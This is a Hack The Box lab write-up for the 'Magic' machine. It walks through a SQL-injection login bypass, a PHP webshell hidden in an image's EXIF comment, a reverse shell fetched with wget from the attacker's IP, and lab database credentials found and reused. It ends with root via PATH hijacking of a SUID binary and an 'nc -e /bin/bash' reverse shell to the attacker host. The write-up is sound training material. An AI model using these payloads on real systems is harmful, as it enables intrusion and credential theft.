Hackthebox Magic writeup

0 Shares

Introduction

It is a medium machine from the hack the box platform.Which has simple authentication bypass to upload a malicious file and then jumping a user followed by privilege escalation using SUID

Steps involved

1-Port Scan
2-Visiting website
3-Authentication bypass
4-Encoding php inside image
5-Uploading malicious file and bypassing security check
6-Uploading php reverse shell
7-Getting full shell
8-Getting db user creds
9-Jumping User(user flag)
10-Analysing SUID
11-Exploiting SUID (sysinfo) via path variable 
12-Getting root flag

Commands involved

1-nmap -sC -sV -v -oV 10.10.10.185
2-exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' rana.jpg 
3-mv rana.jpg rana.php,jpg
4-python -m SimpleHTTPServer
5-python3 -c 'import pty; pty.spawn("/bin/sh")'
6-bash -i
7-cat db.php5
8-mysqldump -utheseus -piamkingtheseus Magic 
9-su theseus
10-find / -perm -u=s -type f 2>/dev/null
11-wget http://10.10.14.20:8000/pspy64
12-echo "/bin/bash" > lshw
13-chmod 777 lshw
14-export PATH=/tmp:$PATH
15-/bin/sysinfo
16-/tmp/nc -e /bin/bash 10.10.14.20 2345

Port scan

Nmap 7.70 scan initiated Tue Apr 21 13:31:27 2020 as: nmap -sC -sV -v -oV 10.10.10.185
 Increasing send delay for 10.10.10.185 from 0 to 5 due to 61 out of 203 dropped probes since last increase.
 Increasing send delay for 10.10.10.185 from 5 to 10 due to 217 out of 723 dropped probes since last increase.
 Nmap scan report for 10.10.10.185
 Host is up (0.52s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
 |   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
 |_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 | http-methods: 
 |_  Supported Methods: GET HEAD POST OPTIONS
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: Magic Portfolio
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Read data files from: /usr/bin/../share/nmap
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Tue Apr 21 13:32:33 2020 -- 1 IP address (1 host up) scanned in 66.55 seconds

Visiting website

The first thing I do is check the website.

So let’s visit it.

It says Login to upload images.

That looks great that we can upload something so let’s try to login.

Authentication bypass

I used simple sqli to bypass the authentication check.

Username='-'
password='-'

And this allowed me to bypass the authentication check.

I tried to upload a .php file but it didn’t allowed.

Encoding php inside image

So now let’s encode the .php file inside the image file.I used exiftool for this purpose.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' rana.jpg

And then just renamed it to rana.php.jpg .So that it can be executed as a php file.

mv rana.jpg rana.php,jpg

So let’s try to upload it.

And it was successfully uploaded.

Uploading malicious file and bypassing security check

But in order to access it we need to know the path of it first.

So for this I uploaded simple image.

And it came on the home page of the website.

So when i viewed it it gave me the path where it was uploaded.

http://10.10.10.185/images/uploads/pic.jpg

So let’s see weather the file is working or not.

Uploading php reverse shell

So it was working fine so i uploaded a full php reverse shell through this.

The php shell i used was.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

First let’s set up python server.

python -m SimpleHTTPServer

So let’s upload it using our malicious image file.You should do it fast as the image get’s automatically deleted after some time.

http://10.10.10.185/images/uploads/rana.php.jpg?cmd=wget http://10.10.14.20:8000/rev.php

Getting full shell

For accessing it i simply visited that.

But don’t forget to start up the nc listener for getting the shell back .

And here i also got a shell back as www-data.

I used spawwing pty python shell to get the full control on the shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
bash -i

Getting db user creds

After some enumeration i got a db.php5 file.

<?php
 class Database
 {
     private static $dbName = 'Magic' ;
     private static $dbHost = 'localhost' ;
     private static $dbUsername = 'theseus';
     private static $dbUserPassword = 'iamkingtheseus';
 private static $cont  = null; public function __construct() {     die('Init function is not allowed'); } public static function connect() {     // One connection through whole application     if ( null == self::$cont )     {         try         {             self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);         }         catch(PDOException $e)         {             die($e->getMessage());         }     }     return self::$cont; } public static function disconnect() {     self::$cont = null; }
 }

Jumping User

It contains db user creds so let’s use these to get the creds of the user .

I used sqldump for this purpose.

mysqldump -utheseus -piamkingtheseus Magic

And got another creds.

admin:Th3s3usW4sK1ng

We had db password for user theseus and the user was on the machine also .So I tried to used these creds for jumping to theseus user.And got the user flag.

www-data@ubuntu:/var/www/Magic$ su theseus
 su theseus
 Password: Th3s3usW4sK1ng
 theseus@ubuntu:/var/www/Magic$ whoami
 whoami
 theseus
 theseus@ubuntu:/var/www/Magic$ cd /home/theseus 
 cd /home/theseus
 theseus@ubuntu:~$ ls
 ls
 Desktop    Downloads  Pictures  Templates  Videos
 Documents  Music      Public    user.txt
 theseus@ubuntu:~$ cat user.txt    
 cat user.txt
 c3*****************************21b
 theseus@ubuntu:~$

Analysing SUID

So now it’s time for privilege escalation .

Let’s see the SUID first.

theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /usr/sbin/pppd
 /usr/bin/newgrp
 /usr/bin/passwd
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/sudo
 /usr/bin/pkexec
 /usr/bin/chsh
 /usr/bin/traceroute6.iputils
 /usr/bin/arping
 /usr/bin/vmware-user-suid-wrapper
 /usr/lib/openssh/ssh-keysign
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/lib/policykit-1/polkit-agent-helper-1
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/xorg/Xorg.wrap
 /usr/lib/snapd/snap-confine
 /snap/core18/1223/bin/mount
 /snap/core18/1223/bin/ping
 /snap/core18/1223/bin/su
 /snap/core18/1223/bin/umount
 /snap/core18/1223/usr/bin/chfn
 /snap/core18/1223/usr/bin/chsh
 /snap/core18/1223/usr/bin/gpasswd
 /snap/core18/1223/usr/bin/newgrp
 /snap/core18/1223/usr/bin/passwd
 /snap/core18/1223/usr/bin/sudo
 /snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /snap/core18/1223/usr/lib/openssh/ssh-keysign
 /snap/core18/1668/bin/mount
 /snap/core18/1668/bin/ping
 /snap/core18/1668/bin/su
 /snap/core18/1668/bin/umount
 /snap/core18/1668/usr/bin/chfn
 /snap/core18/1668/usr/bin/chsh
 /snap/core18/1668/usr/bin/gpasswd
 /snap/core18/1668/usr/bin/newgrp
 /snap/core18/1668/usr/bin/passwd
 /snap/core18/1668/usr/bin/sudo
 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /snap/core18/1668/usr/lib/openssh/ssh-keysign
 /snap/core/8689/bin/mount
 /snap/core/8689/bin/ping
 /snap/core/8689/bin/ping6
 /snap/core/8689/bin/su
 /snap/core/8689/bin/umount
 /snap/core/8689/usr/bin/chfn
 /snap/core/8689/usr/bin/chsh
 /snap/core/8689/usr/bin/gpasswd
 /snap/core/8689/usr/bin/newgrp
 /snap/core/8689/usr/bin/passwd
 /snap/core/8689/usr/bin/sudo
 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /snap/core/8689/usr/lib/openssh/ssh-keysign
 /snap/core/8689/usr/lib/snapd/snap-confine
 /snap/core/8689/usr/sbin/pppd
 /snap/core/7917/bin/mount
 /snap/core/7917/bin/ping
 /snap/core/7917/bin/ping6
 /snap/core/7917/bin/su
 /snap/core/7917/bin/umount
 /snap/core/7917/usr/bin/chfn
 /snap/core/7917/usr/bin/chsh
 /snap/core/7917/usr/bin/gpasswd
 /snap/core/7917/usr/bin/newgrp
 /snap/core/7917/usr/bin/passwd
 /snap/core/7917/usr/bin/sudo
 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /snap/core/7917/usr/lib/openssh/ssh-keysign
 /snap/core/7917/usr/lib/snapd/snap-confine
 /snap/core/7917/usr/sbin/pppd
 /bin/umount
 /bin/fusermount
 /bin/sysinfo
 /bin/mount
 /bin/su
 /bin/ping

The which looks odd is /bin/sysinfo.

Exploiting SUID (sysinfo) via path variable

Let’s see what happens when we run it .

So i decided to have two shell and run pspy in one and in another i will run the /bin/sysinfo suid.

wget http://10.10.14.20:8000/pspy64

When i ran sysinfo and saw it on pspy on another shell i found something special.

This shows that these cmds are running as root when we run sysinfo SUID.

So let’s exploit it.

First let’s upload nc in the /tmp .

wget http://10.10.14.20:8000/nc

I used lshw for the exploitaion.

theseus@ubuntu:/tmp$ echo "/bin/bash" > lshw
theseus@ubuntu:/tmp$ chmod 777 lshw

And now let’s edit the path variable.

export PATH=/tmp:$PATH

And now simply running sysinfo can give us root.

Getting root flag

This shell was not full and i was not able to get the root flag so i started a reverse shell through nc

root@ubuntu:/tmp# /tmp/nc -e /bin/bash 10.10.14.20 2345

And now we have full shell so we can read the root flag.

ls            
 lshw
 nc
 ps
 pspy64
 cd /root
 cat root.txt
 7b##################################f

Thanks for reading the writeup .If you liked it then please support me .

Post Views: 208